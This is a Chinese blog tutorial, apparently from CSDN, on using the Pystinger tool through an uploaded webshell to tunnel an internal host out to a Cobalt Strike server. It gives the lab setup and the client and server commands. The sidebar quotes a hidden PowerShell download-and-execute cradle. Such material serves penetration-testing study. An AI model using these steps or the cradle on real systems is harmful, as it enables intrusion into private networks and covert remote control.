Pystinger实现内网主机CS上线

最新推荐文章于 2024-04-14 15:48:41 发布
最新推荐文章于 2024-04-14 15:48:41 发布
阅读量4.6k 收藏 7
点赞数 1
分类专栏: 内网渗透 Proxy 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38963246/article/details/115300897
版权

Pystinger实现内网主机CS上线

一、Pystinger简介

          毒刺(pystinger)通过webshell实现内网SOCK4代理,端口映射。可直接用于metasploit-framework,viper,cobalt strike上线,主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本。
repo:https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md

二、简化分析

  • 在这里插入图片描述

三、操作演示

          

1. 测试环境:

  1. 攻击机Cobaltstrike <==> 192.168.1.12
  2. Web站点 abc.com  <==> 192.168.1.10
  3. Web站点内网主机A<==> 192.168.1.5

2. 单台主机上线

  1. 上传proxy文件,保证正常访问。
    在这里插入图片描述
    根据站点解析的语言自行选择对应的proxy文件。
    在这里插入图片描述

  2. 目标站点执行命令 start stinger_server.exe
    在这里插入图片描述

  3. 攻击机:
    ./stinger_client -w http://192.168.1.10/asdfbgnbvcsZvxbcxzseqewfrqegnjr.php -l 0.0.0.0 -p 60000
    在这里插入图片描述
    RAT Config 配置: 设置listener为127.0.0.1:60020,payload连接的是127.0.0.1:60020,相当于通过proxy.php将web站点的60020端口映射到攻击机本地的60020端口。

  4. CS配置
    在这里插入图片描述
    生成payload运行即可上线。
    在这里插入图片描述

3. 多台主机上线

  1. Web站点执行:start stinger_server.exe 0.0.0.0
    在这里插入图片描述

  2. 修改监听器重新生成payload并在A主机执行,其余执行命令不变,最后成功上线。
    在这里插入图片描述
    在这里插入图片描述

痴人说梦梦中人
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CS EXE上线主机+文件下载上传键盘记录
流浪法师的博客
07-09 737
书接上文,CobaltStrike_1_部署教程及CS制作office宏文档钓鱼教程,该篇介绍【使用CS生成对应exe木马,上线主机;对上线主机进行,文件下载,文件上传,键盘记录】
cs内网横向的使用(靶机)
sweetie 的博客
11-02 1554
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外网,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
内网渗透-cs上线之提权测试方法
lza20001103的博客
04-14 1076
内网渗透-cs上线之提权测试方法
内网安全】——CS操作指南(一)
Demo不是emo的博客
02-03 8705
cs基础教程(一),cs的安装和启动
内网安全】——CS操作指南(二)
Demo不是emo的博客
02-03 3998
cs操作指南三部曲第二部——cs功能讲解
内网工具 CS的基础使用
m0_57856283的博客
03-12 7143
1 powershell 技术 1.1powershell 简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework 的强大功能。 它引入了许多非常有用的新概念,从而进一步扩展了您在 Windows 命令提示符和 Windows Script Host 环境中获得的知识和创建的脚本。 Windows PowerShell v3 将伴随着 Microsoft Hyper-V 3.0 和 Windows...
内网ctyunos主机通过pip部署ansible具体部署文档可私信
最新发布
04-23
* ctyunos主机网络环境:内网主机,无法连接外网 * yum源只能录取部分基础工具安装 * pip 因外网环境限制,导致无法从外网拉去工具依赖包等。 * 内核版本为ctyunos,导致寻常通过可连接外网的centos主机制作的离线...
使用反向ssh从外网访问内网主机的方法详解
09-15
这样一来,外网的服务器就可以通过这个映射的端口与内网主机建立连接,实现从外网到内网的访问。 操作步骤如下: 1. 准备一台拥有固定外网IP的服务器A和需要访问的内网主机B。确保两台机器都开启了SSH服务。 2. ...
C# TCP socket通信实现内网穿透
11-09
C# TCP通信socket通信源代码,包含服务端与客户端,注册花生壳映射端口后可以实现内网穿透,通信消息进行加密解密。
SSH端口转发实现内网穿透的实现
09-14
主要介绍了SSH端口转发实现内网穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
远程控制内网+外网上线配置
07-04
1、内网中机器设置:(1)、控制面板---添加删除程序—添加组件----IIS----“万维网服务”、“远程WEB连接” (2)、控制面板---用户帐户----新建帐户----管理员密码 (3)、我的电脑右键“属性”,“远程”选项卡,...
工具使用】Pystinger(毒刺)的使用
做自己喜欢的事,并将其发挥到极致!
03-09 1387
文章目录Pystinger介绍项目地址Pystinger 原理图实现主机上线CS服务端配置客户端配置 Pystinger介绍 一款用于Webshell实现内网 socks4 代理、端口映射的工具,可直接用于CobaltStrike / Metasploit上线,该工具使用python语言编写,目前支持的语言有 php, jsp(x) 和 aspx 三种脚本语言。 项目地址 https://github.com/FunnyWolf/pystinger https://gitee.com/zhanghk66
内网安全-代理Socks协议&CS-MSF控制上线
m0_65336233的博客
12-19 1847
内网安全-代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线
pystinger (毒刺)正向代理工具
weixin_66717977的博客
03-21 1559
pystinger毒刺是一款正向代理工具,通过webshell可以实现内网 socks4代理和端口映射,并且也可以直接上线MSF和CS
内网横向渗透神器-CS
qq_39756628的博客
06-22 2427
简介: Cobaltstrike是内网横向渗透中团队作战神器,也被称为CS,目前已有4.1版本,本文这里提供v4.0下载链接:https://gitee.com/yaogodv/cobaltstrike4.0/tree/master/cobaltstrike4.0 一、CS服务器启动: 以本地kali(192.168.3.134)为服务器,进入相应目录,直接运行: ./teamserver 192.168.3. 134 ztf 二、本地客户端连接: 直接启动start.bat,需要有java的环境,没
内网穿透到cs上线--部署到公网上!!
qq_29437513的博客
05-28 1993
本文就一句话: cs部署到公网上; 以下为水文 记上一篇,部署内网穿透后;想让cs上线,服务机kali和目标机都放在内网; 设想的流程是: 服务机先出网->(通过穿透)->监听->目标机上线 这里我参考了这位兄弟的博客 https://blog.csdn.net/qq_41728581/article/details/114385054 让我有些意外的是,cs连接的是服务端穿透后的端口,而且连上了,这里实现了服务端的穿透; 剩下一半是监听的穿透; 摸索了两个小时,问题出现在下面的图中
Pystinger上线不出网机器
来到了学渣的博客
10-26 2115
实战拿shell后发现,这个机器ping不通外网,没有办法走网络层协议,所以需要搭建不出网隧道,但经过实验,建议最好是php环境会比较稳定。同样操作jsp环境下问题居多 相关介绍 Kali作vps 192.168.201.129 目标win7:192.168.201.132 目前拿下win7 shell 上传对应的Pystinger webshell文件并成功访问 然后将 stinger_server.exe上传到目标服务器 ,执行如下命令: start stinger_server.exe
cs内网靶机练习(上)
qq_45300786的博客
09-25 1451
通过dumpfile函数导出数据到一个文件。 (把数据导入到一个叫123.php的文件) 访问这个写入的木马成功。 本地测试 注:在mysql的高版本或者正常版本中,是不允许使用dumpfile函数、outfile函数的和load_file函数的 详细说明请参考这个https://www.cnblogs.com/zztac/p/11371149.html 堆叠注入,就是多行注入 靶机演示 先传参一些乱七八糟的东西,使它爆出绝对路径。 然后通过导出函数写入文 ?id=1 and 1=2 un..
如何链接公网ip内网主机
09-16
要将公网IP地址与内网主机链接起来,我们可以使用网络地址转换(NAT)和端口转发的方法。以下是具体步骤: 1. 确定公网IP地址:首先,要链接公网IP地址,需要了解你的公网IP是什么。可以通过访问网站如whatismyip....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值